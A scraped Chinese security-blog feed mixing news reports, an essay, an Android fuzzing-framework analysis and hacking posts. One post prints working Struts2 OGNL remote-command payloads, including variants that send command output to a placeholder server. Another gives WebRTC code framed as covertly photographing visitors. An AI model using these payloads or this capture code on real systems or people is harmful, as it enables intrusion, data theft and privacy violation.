著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 虚假客服电话充斥互联网行骗 专家:竞价排名是祸首 公布 GFW 防火墙旗下部分子服务器 IP 电信诈骗韩国人案抓235人 涉案金额1亿多 男子侵入上海移动平台群发广告短信牟利获刑 802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks 福布斯:IE10“禁止追踪”扼杀网络广告市场 如何加载 VMware Workstation v8.0.1 加密过的虚拟磁盘文件(vmdk) 网购158元的货物之后被网站“钓”走2万 谷歌放出首个由Google眼镜拍摄的视频 720P格式 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 浙江绍兴一犯罪团伙用网银漏洞诈骗三百余万获刑 看FBI是怎么网络钓鱼执法的 苹果欲建造内部食堂 防止保密信息泄露 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 美军投资新型隐形眼镜 可将信息投射到眼球上 碰到一个冒充QQ好友进行诈骗的骗子…… 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 QQ邮箱漏洞被骗子利用 小企鹅一闪1000块被骗走 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? Google开发扩展现实眼镜 基于Android系统运行 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 我国将建立IP地址黑名单制度 打击网络垃圾邮件 小米官网“闹鬼” 消费者买手机三千元被骗 美国色情网站遭黑客袭击 7.3万用户资料泄露 Mydecms 贤诚文章管理系统泄露数据库账号、密码、库名漏洞 惊爆“17岁少女黑客 fly”高清无码裸照!!这下你真的火了!!! 末世入侵行动 (Fire Sale!) 末日入侵行动 黑客曝联通“10010短信”漏洞 被指易遭诈骗利用 网络钓鱼危急行业发展 专家呼吁各方合力围剿 用 js 实现本地 md4、md5、sha1 加密表单并提交 视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步! 互联网信息办公布用户信息泄露事件查处情况 2012年新浪微博用户密码泄露漏洞(图片解析) 黑客考虑发射通讯卫星对抗全球互联网监管 目前我认为是2011密码泄露事件最合理、最符合实际的一个解释 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”! 索尼又遭黑客攻击 或致9万余份用户信息泄露 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 北京警方破获新型网络合同诈骗案 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 国内各类 WebShell 密码大全 爆破、社工用 webshell-password VB Html编码、Html解码、Html加密、Html解密、Html转义字符 【转载】高级社工:从QQ空间可以暴露的信息 美国军方遭黑客袭击 泄露大量秘密信息 黑客的新目标:泄密其他黑客资料 国家计算机病毒中心发现新型蠕虫 即时聊天要当心 【视频】NRF24L01无线射频模块实现无线视频通讯实例 【视频】NRF24L01无线射频模块 实现无线视频通讯实例 艺电称旗下一网站遭攻击 用户资料泄露 CMCC【中国移动】无线热点破解思路 破解无线wifi密码后不能上网的问题解析 台两15岁少年开淫窟 骗12名少女为“爱”卖身 月进300万元 【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客 索尼承认1000万信用卡资料遭盗窃 索尼PSN数据被黑激怒全球客户 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 囧事 知名反病毒厂商卡巴斯基源代码泄露 能直接在眼球上投影图像的隐形眼镜,智子? 呵呵,腾讯?QQ?网民隐私?公安监控? 360秘密收集用户信息日志文件大规模外泄 无银行卡,密码10万元1分钟转走,超级黑客? 【文章】10.3 通信信道加密 链对链 端对端 【文章】Winrar 压缩软件的加密算法 - AES 【文章】9.6 密码反馈模式 初始化向量 错误 【文章】9.3 密码分组链接模式 - 反馈寄存器 【文章】9.1 电子密码本模式 - 多重加密处理 【文章】8.10 密钥有效期 密钥破译 密文分析 【文章】8.9 泄露密钥 对称密码 私/密钥泄露 【文章】4.14 密钥托管 密钥托管的政治 安全 【文章】4.13 秘密的全或无泄露 ANDOS协议 【文章】应用密码学: 加密数字签名 重发攻击 【文章】应用密码学 - 隐写术代替和换位密码 【文章】应用密码学:前言 - 作者简介 - 目录 3389 远程桌面 Mstsc RDP协议详细解析 (下) 360,腾讯等公司之间的战争,以及网民用户隐私 【公告】公布一个特大诈骗案件的网络“黑客” 扫描指定IP网段存在的网络摄像头、监控设备 【VB技巧】VB URL编码与解码 URL加密与解密 【VB技巧】VB Base64编码/解码/加密/解密 【Asp】ASP Unescape加密/解密/编码/解码 【漏洞】Microsoft IE CSS处理跨域信息泄露 【计算机常识】双机无线wifi互联教程 【技巧】用无线路由实现无线桥接 【工具】无线破解/渗透工具 Beini-1.2.1 渗透某餐厅无线点餐服务器 全套手机秘籍/手机指令 DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 Nohl破解GSM加密算法的演示稿 GSM加密破解演示PPT(英文) 1479_26C3.Karsten.Nohl.GSM.pdf 留言评论(旧系统): 佚名 @ 2015-08-31 18:02:58 我只想说,真tm太装b了 本站回复: -_-!!! 狼狼恶狗 @ 2015-09-23 09:03:57 大哥收徒弟不 本站回复: 不收~ -_-!!! a83721 @ 2015-09-28 21:46:33 这个俺看懂,里面是来人感应自开的。 本站回复: -_-!!!

2015/8/31
articleCard.readMore

这就是事故发生的原因……

我们自己的每一次“没做好人”,都像迎风吐痰,都是给世界设下的一个圈套,这个圈套也许大也许小,但最终很可能重新套回到我身上。因为社会本身就是一个整体,这里面生存的每一个人,不分职业身份,无论贫富贵贱,大家共同织起一张网,也共同做这网里的鱼。 1、冰箱师傅、饭店老板 “我是个修冰箱的。前段时间一个小饭店的冰箱门关不上,我去给他们修好了。其实当时我就发现那个冰箱的制冷系统泄漏,制冷剂快要跑光了,但我没说,因为如果下次再去修的话,就能多拿三十块钱上门费。果然,没到一个月那台冰箱就不制冷了,他们又喊我去修,我不但多拿了三十块钱,还以五折的价钱从这家店买了些酱牛肉,赚了。” “我是一家小饭店的小老板。现在的东西真靠不住,冰箱一个月坏了两次,大夏天的,里面的熟食都坏掉了,都是贵东西,我舍不得扔,让厨师重新煮了,用重料盖掉腐味,低价卖掉了。修冰箱的师傅买了一些,后来他打电话来说,全家吃了都拉肚子。我有点愧疚,当然也没有承认是我们的问题,吃都吃光了,他没凭没据的,到哪儿也说不清了。” 2、玩具厂老板,建筑工人,质监局领导 “我是个儿童玩具厂的小老板。不瞒您说,我们的玩具都是用回收的废塑料、生活垃圾、医疗垃圾做的,我当然知道这些二料含铅含贡含甲醛,会对孩子健康有害,但是现在生意这么难做,都用真材实料能赚几块钱?” “我是个建桥的工人,这次找了个不错的活,别的工地一天一百二,这里给一百五。上班第一天我就明白了他们工钱高的原因——这是个豆腐渣工程,拿沙子充水泥,拿水泥充钢筋。别的工人不敢干都走了,我咬咬牙留了下来。儿子上个月查出白血病,我那点家底砸锅卖铁也不够他治病的,再不多赚点钱,就只能眼睁睁看着他恶化了。” “我是个质监局的领导,上次查了一批玩具小作坊,一个小老板找到我老婆说情,又给我捎去两瓶五粮液,我就把他那批玩具放了。昨天他又被查到,我又帮了他个小忙。处理完事情后他请我吃饭,万没想到,饭后回家的路上,开车过新桥时,那桥居然说塌就塌了!我俩一起栽了下去,双双骨折,唉~” 3、医生,法官,校长,农民 “我是个医生。去年一家医疗器械厂来推广他们生产的心脏支架,回扣很高,我看了看,质量好像没什么问题,就用了。没想到丫给的居然是伪劣产品,才用了一例就出医疗事故了。” “我是个法官。一个老朋友的医院出了医疗事故,来找了我好几次,看在多年情分上,我睁一眼闭一眼,在判决时没让他们担什么责任。” “我是个重点中学的校长。每次开学时来报名的家长都打破头,这学期好不容易都定好了,一个法官的女儿又来加塞,这很难办。也真巧,偏偏有个学生上课辱骂老师,我们从重处理,把他开除了,这才倒出一个名额来给她。” “我是个农民,去年拿出所有积蓄做了一次心脏搭桥手术,却被伪劣支架给坑了,医院没赔什么钱,家里就快弹尽粮绝了。之前满心指望孩子能有点出息,可这个不争气的东西却让学校开除回来了。我已经没有劳动能力,就干脆让他弃学在家侍弄大棚。这几天出菜花,他去喷杀虫剂。没想到这倒霉孩子不认识农药,居然稀里糊涂拿错了,还超量喷了上去。结果好些人吃了以后农药中毒,听说有医生,有法官,有校长... ...” 4、我是个上班族 “我是个上班族。昨天风好大,我在上班的路上打开车窗向外吐了口痰,居然被大风吹回到自己脸上,太倒霉了!” ... ... 不知道你信不信因果循环,善恶有报。反正我信。当然大多数时候,我都认为是别人在作恶,自己从来没有。我只是有时候做了顺水人情,有时候睁一眼闭一眼,有时候随便一抬手一放手——顶多只能说是没有摸着良心做好人。但见了很多事情以后,我好像明白了些什么。 ——可能就是那么一随便,就有人倒霉了。而倒霉的那个人,可能就是整个社会第一张倒下的多米诺骨牌,他倒了,就全倒了。如果这个社会人人都倒霉,肯定也跑不了我。 我的每一次“没做好人”,都像迎风吐痰,都是给世界设下的一个圈套,这个圈套也许大也许小,但最终很可能重新套回到我身上。因为社会本身就是一个整体,这里面生存的每一个人,都肩并肩手挽手地联络在一起,不分职业身份,无论贫富贵贱,大家共同织起一张网,也共同做这网里的鱼。 所以现在我知道,如果自己不想倒霉,那就尽量不要让别人倒霉,如果我希望身边都是好人,那自己首先要做个好人。 因为做好人其实也是一个圈套,套来套去,总会把好运套到自己头上。 (文/李月亮) 留言评论(旧系统): 佚名 @ 2015-08-23 00:25:43 请在这里填写留言内容,最长不超过 1000 字。 本站回复: [暂无回复] 这是根本 @ 2015-08-23 09:22:29 人的本能而已,谁都会有欲望,国家想通过法律和道德来抑制欲望,其实然并卵。总之生存在这个世界上,没有规则限制的生存下去,迟早会自我毁灭的。任何人,以及任何生物。 本站回复: 欲望+1 zerovos @ 2015-08-24 09:00:09 我经常看你的更新,可是现在更新的不勤快了,有点偷懒哦,有点失望,该打屁屁, 本站回复: 最近比较忙,没有太多时间和精力去管理博客。-_-!!! 佚名 @ 2015-08-25 10:14:39 我经常看你的更新,可是现在更新的不勤快了,有点偷懒哦,有点失望,该打屁屁, 本站回复: 最近比较忙,没有太多时间和精力去管理博客。-_-!!! 佚名 @ 2015-08-25 17:48:32 我是看下验证问题的 本站回复: -_-!!! 娃哈哈 @ 2015-08-26 21:11:42 我经常看你的更新,可是现在更新的不勤快了,有点偷懒哦,有点失望,该打屁屁, 本站回复: -_-!!! 嘿嘿嘿 @ 2015-08-27 09:52:48 别说话 我硬了 含住 本站回复: -_-!!! daj8 @ 2015-08-29 23:04:29 请在这里填写留言内容,最长不超过 1000 字。 本站回复: [暂无回复] D @ 2015-08-30 23:30:53 可以转载吗 本站回复: 可以。 佚名 @ 2015-08-31 22:54:16 我可以转载么 本站回复: 可以。 佚名 @ 2015-09-01 11:14:42 好人有好报 本站回复: -_-!!! 佚名 @ 2015-09-03 13:36:27 ,,请问宇宙第一强国是? 没法治了,这是个无敌的国家。 文章转走了昂 本站回复: -_-!!! 佚名 @ 2015-09-19 22:11:18 我说我的网站这几天老被D 看样是找到原因了。。。 本站回复: -_-!!! 狼狼恶狗 @ 2015-09-23 09:20:34 其实我想说,我想做坏人。但我没能力啊。。 本站回复: -_-!!!

2015/8/21
articleCard.readMore

MFFA:Android多媒体文件漏洞Fuzzing框架分析与测试

本文首发www.droidsec.cn | 安卓安全中文站 转载请注明出处 0x01.MFFA简介 MFFA(项目地址:https://github.com/fuzzing/MFFA 作者Alexandru Blanda来自Intel)是一个基于Python开发的通过对Android平台多媒体文件解码功能进行模糊测试从而发现可能的安全漏洞的安全测试框架,主要原理是通过指定一些畸型但在结构上是有效的媒体文件发送到Android设备中的组件进行解码或者是播放,与此同时监测系统发生的一些可能导致可利用漏洞的潜在问题(如Crash),最后对fuzzing结果进行自动整理过滤掉大部分重复问题和误报,研究者可以通过手工分析来确定最终的结果。 通过对此框架的分析,我们可以复现最近热门的Android Stagefright组件漏洞的挖掘方法,甚至可以对框架进行二次开发,用于Android系统0day挖掘,移动App客户端产品安全测试。 0x02.使用方法 (1)环境要求 支持Linux环境(修改后支持Mac/Win平台),Python 2.7及以上版本本,Android SDK工具包。同时需修改Android源码并重新编绎以启用Stagefright命令行界面工具。(可使用Genymotion中的Android4.1.1版模拟器代替) (2)开始测试 python test.py stagefright <video|audio><play|noplay><index> <video|audio>选择测试的文件是视频/音频类文件 <play|noplay>在音频测试中,选择是否启用播放功能以检测某可能的漏洞 <index>如果中途中止测试,指定断点处重新启动测试 (3)结果分类 python triage.py <SIGSEGV|SIGILL|SIGFPE|all><video|audio> <SIGSEGV|SIGILL|SIGFPE|all>过滤的信号种类 <video|audio>测试的文件种类 0x03.原理分析 (1)目标 发掘那些能引起Crash,进程挂起,拒绝服务,缓存溢出,空指针引用错误,整数溢出的安全漏洞 (2)流程图 (3)测试数据生成 (4)Fuzzing测试流程 <1>后端布署服务器运行测试文件生成工具保存测试数据 <2>服务发送大量测试cases到本地主机 <3>主机自动分配测试文件到连接的Android设备上 <4>每个Android设备以分布式方式接收测试文件并分别记录结果 (5)结果整理模块 <1>第一次运行阶段 >在设备中运行测试case >记录每次运行过程中创建的log日志 <2>分类阶段 >生成的日志被用于分析标记发生Crash的测试case >重新测试发生了Crash的case >之前没有检测到的Crash将存储在独立的issues pool <3>筛选阶段 保存异常信息的目录主要位于data/tombstones和data/system/dropbox,通过分析这些日志可以定位相关存在问题的Native层so文件的问题代码大概位置。 1.解析log日志文件确认该case造成了Crash 2.重新发送文件以测试Infrastructure 3.对于发送的每个文件: a.获取生成的tombstone文件 b.解析tombstone文件然后获取PC值 c.检测PC值是否之前遇到过 d.如果是新的PC寄存器值,保存相应的tombstone日志文件 4.最后每个issues保存在独立编号的文件夹 如下图是某次Crash日志截图, signal 11( SIGSEGV)是在Linux信号中表示无效的内存引用,如下是存在问题的PC寄存器值及详情: 0x04关键代码 整个框架的实现其实比较简洁,关键代码都是使用python的subprocess模块实现子进程管理,获取从adb接口返回的管道信息。这里仅列出相关adb命令: 1.adb logat -c 在开始测试清除设备之前生成的logcat日志 2.adb logcat -v time *:F >logs/测试文件名+_stagefright+设备名 保存当前case运行过程中的log日志到指定文件夹 3.adb shell stagefright -s -a /data/Music/ adb shell stagefright -r /data/Movies/ 调用stagefright的命令行工具对/data/Music文件夹的测试文件进行解码 -s参数是优先使用software软解码 -r参数是强制使用Hardware硬解码 -a参数表示解码的是audio音频文件 4.adb shell stagefright -p 列出当前的解码器配置 5.adb shell stagefright -l 列出当前的组件 6.adb push /batch/file1 /data/Music/ Push测试⽂件到设备指定目录 7.adb shell log -p F -t Stagefright -sp_stagefright ‘****”+当前任务序号+”- Filename:’”+ 当前测试文件名 在测试设备的log日志中以指定格式插入一条log日志用于标识当前任务序号开始位置 8.adb pull /data/tombstones/tombstone_00+tombname 抓取发生异常的日志 0x05测试运用 1.在对ZIMPERIUM(Stagefright漏洞发现者所在公司)公布的POC视频进行测试后发现,所有测试视频都能被检测出存在问题。 2.使用框架的筛选功能 0x06二次开发 1.目标与用途: 打造高效智能的自动化Fuzzer工具,用于对Android系统自带组件,及种各种应用进行安全测试,以发掘潜在的安全漏洞。 2.案例: 对Android市场中的浏览器视频解码功能进行fuzzing测试发掘可能导致的crash,对Google ANDROID系统自带的短信应用进行fuzzing测试发掘可能导致远程拒绝服务的漏洞。 原文地址:http://www.droidsec.cn/mffa-android%e5%a4%9a%e5%aa%92%e4%bd%93%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9efuzzing%e6%a1%86%e6%9e%b6%e5%88%86%e6%9e%90%e4%b8%8e%e6%b5%8b%e8%af%95/ 留言评论(旧系统): 佚名 @ 2015-08-20 12:06:49 核总,求个邀请码 t0ols@qq.com 本站回复: 没有邀请码。

2015/8/13
articleCard.readMore

Struts2命令执行POC增强版

Struts2命令执行POC增强版 Wulala (^..^ ^..^ ^↓^ ^..^ ^..^) | 2015-08-04 13:06 Struts2命令执行的漏洞大家比我都了解, 网上公开的也有很多利用的POC. 带回显命令执行: ${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType(%27text/html%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} Bool型SSRF的思考与实践 POC.SSRF版 ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23t%3d%23d.readLine(),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType(%27text/html%27),%23matt.getWriter().println(%23e),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} Drops: Bool型SSRF的思考与实践 15# Wulala (^..^ ^..^ ^↓^ ^..^ ^..^) | 2015-08-05 21:55 @我是壮丁 上面把最重要的说了,这里补充一点. 如果仅仅做检测可以通过下面的POC: /action?action?redirect:http://SERVER/%25{3*4} 简单 高效 实用... [原文地址] 留言评论(旧系统): 大鸡鸡 @ 2015-08-11 19:09:44 SSRF完全是画蛇添足。 本站回复: -_-!!!

2015/8/10
articleCard.readMore

利用HTML5新特性之WebRTC进行拍照,可偷拍手机、电脑视频、照片

利用HTML5新特性之WebRTC进行(tou)拍(pai)照 jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-08-05 19:09 很早以前就知道html5可以获取视频流和声音流,但是并没有深入实现,因为js渣。获取内网IP的倒是用过。 然后无聊翻了翻git,找到了利用webrtc获取视频流并拍照的Demo,改了一点代码,可以用来进行偷拍 WebRTCC功能: WebRTC的视频部分,包含采集、编解码(I420/VP8)、加密、媒体文件、图像处理、显示、网络传输与流控(RTP/RTCP)等功能。 详细介绍请看百科:WebRTC 获取视频流Demo: <html lang="zh-CN"> <head> <meta charset="UTF-8"> <title>GetUserMedia</title> </head> <body> <!--<video id="video"></video>--> <video id="video" autoplay></video> <img src="" id="img" ></img> <canvas style="display:none;" id="canvas" ></canvas> <!--<button onclick="cli()" value="test2">test</button>--> </body> <script type="text/javascript"> var canvas = document.getElementById('canvas'); var ctx = canvas.getContext('2d'); var video = document.getElementById('video'); var getUserMedia = (navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia); getUserMedia.call(navigator, { video: true, audio: true }, function(localMediaStream) { video.src = window.URL.createObjectURL(localMediaStream); video.onloadedmetadata = function(e) { }; }, function(e) { console.log('Reeeejected!', e); }); //var video = document.getElementById('video'); var localMediaStream = null; function snapshot() { if (localMediaStream) { ctx.drawImage(video, 0, 0); document.getElementById('img').src = canvas.toDataURL('image/png'); } } function cli(){ alert(1); video.addEventListener('click', snapshot, false); } /*var video = document.getElementById('video'); var canvas = document.getElementById('canvas'); var ctx = canvas.getContext('2d'); var localMediaStream = null; function snapshot() { if (localMediaStream) { ctx.drawImage(video, 0, 0); document.getElementById('img').src = canvas.toDataURL('image/png'); } } video.addEventListener('click', snapshot, false); //不使用供应商前缀 navigator.getUserMedia({video: true}, function(stream) { video.src = window.URL.createObjectURL(stream); localMediaStream = stream; }, onFailSoHard); */ </script> </html> 请使用支持HTML5的浏览器打开(Firefox、Chrome...) (PS0:手贱尝试允许访摄像头的,被拍请不要找我!) (PS1:拍照 后图片会存储到服务器,不要问我存在哪。。) 至于是否可以绕过用户授权这一步骤直接进行偷拍..(这种神技还是请召唤伟大的二哥@gainover吧) Just a fun! [原文地址] 各种吐槽: 1# Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2015-08-05 19:10 。。 2# D&G | 2015-08-05 19:11 nice 3# 随随意意 (WB出售1:15) | 2015-08-05 19:19 。。 4# Aepl│恋爱 | 2015-08-05 19:41 5# Aepl│恋爱 | 2015-08-05 19:43 幸好我没手贱 我老婆正在换衣服 哈 6# 金枪银矛小霸王 (:)) | 2015-08-05 19:59 我拍了好多张:) 7# jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-08-05 21:02 后面挂着衣服的小伙伴是谁~还歪着头来了个微笑 @金枪银矛小霸王 是你吗? 8# Jn· (小学生一枚,不服你TM别打我.) | 2015-08-05 21:03 前两天就在国外看到相同的demo 9# 浮萍 | 2015-08-05 21:11 有提示 问是否共享xxx 10# huoji (<script>A</script>) | 2015-08-05 22:29 幸好我没手贱,,, 我正在换衣服 哈 11# 金枪银矛小霸王 (:)) | 2015-08-05 22:46 @jeary 不然。:) 12# 无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2015-08-05 23:29 弄个虚拟摄像头放个群众喜闻乐见的东西…… 13# 柯腾 | 2015-08-06 01:34 求SAVA.PHP代码 14# mramydnei | 2015-08-06 07:29 现在有支持这玩意儿的手机浏览器了么..? 感觉搞手机最high啊 15# z@cx (日复一日,年复一年) | 2015-08-06 09:38 弄个朋友圈分享发给女神 16# 鬼见愁 | 2015-08-06 09:59 这个不错啊, 偷拍神器自动上传服务器吗 17# 鬼见愁 | 2015-08-06 09:59 笔记本用户 命中率百分99 18# 一只猿 (我是猴子派来的彩笔) | 2015-08-06 10:10 围观前端牛 19# 疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-08-06 10:16 卧槽,我被偷拍了么…… 20# 啊L川 (我想起那天下午夕阳下的奔跑,那是我逝去的青春...) | 2015-08-06 10:24 赶紧围观 21# 浩天 | 2015-08-06 10:31 XSS有新玩法了 22# ❤ (❤) | 2015-08-06 10:35 那天你叫我做实验原来是这个,还好没上当,要不被拍到果照就不好了... 23# 指尖上的故事 | 2015-08-06 10:56 有鸟用我分分钟写个这个玩意出来 24# 刘海哥 (‮moc.ghuil.www) | 2015-08-06 11:07 @指尖上的故事 人家是问,至于是否可以绕过用户授权这一步骤直接进行偷拍. 25# 安全小飞侠 (走自己的路,让别人无路可走) | 2015-08-06 12:20 @jeary 感觉挺好玩的 26# only_admin (学生|未成年) | 2015-08-06 13:23 @jeary 手贱点了禁止,看不到允许后的效果了。如果允许,会显示拍到的图像吗 27# x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2015-08-06 16:08 mark 28# M4ster (Black || White) | 2015-08-06 16:16 http://hacktask.net/hacklab/WebRTC_Get_Photo/ 29# HackPanda | 2015-08-06 21:12 写了个存储在数据库的 链接: http://pan.baidu.com/s/1ntkVK0L 密码: eiyz 30# 毕月乌 (I am Jia Ma.) | 2015-08-06 22:10 直接禁用了WebRTC的表示毫无压力~ 31# Royal. | 2015-08-09 16:58 直接黑胶布贴在摄像头的路过。 32# _Evil (科普是一种公益行为) | 2015-08-10 10:11 被你这么一说我就@下二哥 @gainover 33# wefgod (求大牛指点) | 2015-08-10 12:02 谁传的1.php? 留言评论(旧系统): 亻失夕口 @ 2015-08-26 03:58:26 爱玛,我和姘友讨论这个10号MM差点要打起来了,核公鸡你说说看到底她是张柏芝还是真就一只鸡?我姘友只有这二个选项,我我咋觉得她像拍过森莫广告的,太太口服液?哦对了,顺便代表2014年清朝的reservoirdev,com问候2015年8月发这个主题开灌的毅丝哈,都不知道你拿来当火星文还是什么的,产业链?明码标价2.99$ 啊,说的就是reservoirdev、com 本站回复: 不知所云~ -_-!!!

2015/8/10
articleCard.readMore

北京NDS公司工程师攻击46万台机顶盒传播反动信息 获刑12年

8月3日,央视《焦点访谈》报道了一起黑客将反动信息通过技术手段直接植入用户机顶盒的网络安全案件,案件性质关系到国家安全。据报道,案件犯罪嫌疑人王一波系北京NDS公司工程师,因出于个人泄愤,在2014年8月1日晚间对46.5万台温州中广有线电视机顶盒实施攻击破坏,传播大量反动宣传图文,传播范围涉及15.98万户人家。 2015年7月15日,温州市中级人民法院作出终审判决,王一波因破坏计算机系统等罪名,被判处有期徒刑12年,剥夺政治权利2年。 央视报道如下: 说到网络遭到黑客攻击,网站瘫痪了、网页被篡改了,或者说是网络账号被盗,钱被偷了,这些事我们听说过甚至遇到过,它们都属于违法行为,情节严重的还可能会被追究刑事责任。我们今天要说的这件事,也是涉及网络安全的案件,它与我们熟悉的有线电视机顶盒相关,案件的性质关系到国家安全。 2014年8月1日晚上7点,在浙江温州,很多正在家中看电视的居民都被眼前的一幕惊呆了。在电视屏幕之上出现了大量反动宣传图文,传播范围涉及温州市鹿城区、龙湾区、瓯海区以及洞头县的15.98万户人家,一共46.5万台中广有线电视机顶盒遭受黑客攻击。 接到群众报警之后,温州市公安机关迅速组织警力赶往温州广播电视中心开展紧急处置。直至第二天凌晨6点多,才将机顶盒中的有害信息彻底消除。 据民警介绍,黑客将反动信息通过技术手段直接植入用户机顶盒,这是针对有线电视网络新型的攻击方式,此前从未出现过,其传播范围更广,社会危害性更大。 案发之后,当地迅速成立了由网警、刑侦等多部门组成的专案组全力侦破此案。要找出幕后黑手,专案组需要解决的第一个问题就是确定攻击到底来自广电系统内部还是外部,这样才能给案件侦破指清方向。 在温州广电中心,专案组在此前查封现场时发现,有两台服务器停止了运行。在排除黑客外部入侵的可能性之后,专案组将调查方向转向了这2台被毁掉的服务器之上,希望从这里找到黑客留下的蛛丝马迹。然而,黑客作案后所有数据和日志均被其设计的木马程序自动删除且无法恢复。 技术侦查一时间陷入了困局,然而专案组在人员排查上却找到了突破口。 据了解,NDS公司一直是温州中广有线的技术维护公司。专案组随即对NDS公司北京、深圳分部的40余名高管和技术人员全面开展调查,排查可疑线索。 经过大量走访调查,北京NDS公司工程师王一波进入了警方视野,他的特征与专案组此前刻画分析的犯罪嫌疑人特征较为吻合。首先,他具备作案必备技能,能够侵入被黑客攻击的系统。其次,由于长期未受重用,他曾多次流露出对公司和社会的不满,具备作案动机。 在王一波被专案组盯上之后,负责技术侦查的办案人员,也在被毁坏的服务器中发现了犯罪嫌疑人留下的蛛丝马迹。 办案民警锁定的犯罪嫌疑人就是王一波,然而他身在美国,一旦打草惊蛇,他很有可能滞留国外。为此,专案组必须秘密地推进各项调查工作。 终于,专案组收到消息,王一波将于8月16日回国,这是抓捕他的大好机会。2014年8月16日下午5点左右,刚刚走出北京首都国际机场的王一波便被专案组以协助调查的名义,顺利带至温州。 当晚,专案组立即开展了对王一波的审讯工作。但一开始专案组就碰到了很大的困难。由于王一波拒不交代,案件难以最终告破。关键时刻,民警们及时调整了审讯策略,不再直接讯问案子的事情,转而跟他谈人生,谈他的工作,民警们逐渐获得了王一波的信任。 在对王一波审讯期间,恰逢其儿子12周岁生日,专案组为王一波及其妻儿安排了生日聚会,并代王一波为儿子准备了一份生日礼物,这些都让王一波深受触动。 2014年8月18日,被抓捕两天之后,王一波最终承认,其出于个人泄愤,对温州中广有线电视网络实施攻击破坏,至此这一案件最终得以告破。 因为泄愤,王一波一手毁掉了幸福的家庭,还有自己的人生,他后悔不已。 2015年7月15日,温州市中级人民法院作出终审判决,王一波因破坏计算机系统等罪名,被判处有期徒刑12年,剥夺政治权利2年。 网络安全关系到国家安全,也关系我们每个人。在今年7月1号开始实施的《国家安全法》中就明确,维护国家安全的任务之一就是“防范、制止和依法惩治网络攻击、网络入侵、网络窃密、散布违法有害信息等网络违法犯罪行为”。危害国家安全,违法必被究。国家安全,也需要人人维护,才能创造一个稳定的生活和发展环境。 犀利吐槽: 26# newline (我只相信狭路相逢勇者胜) | 2015-08-04 23:20 这种性质的一般都是省级督办,即使最后他没有承认,也可以0口供定罪,而且很有可能判的不止12年。。 要是你犯的是小事, 黑个网站,没有损害到人家核心利益, 咬死不承认, 撑个一两天就可以走人了, 这种警察也不想跟你耗,前提是你跟警察没有私仇。 意思是该不该承认要看案件的大小, 要是在美国, 警方取不到你的完整口供,只有证据也是无法定罪的。这就是法治和法制的区别。。 其实那个警察也不是完全在骗他,一部分属于私心,另外一部分是真的对他好。 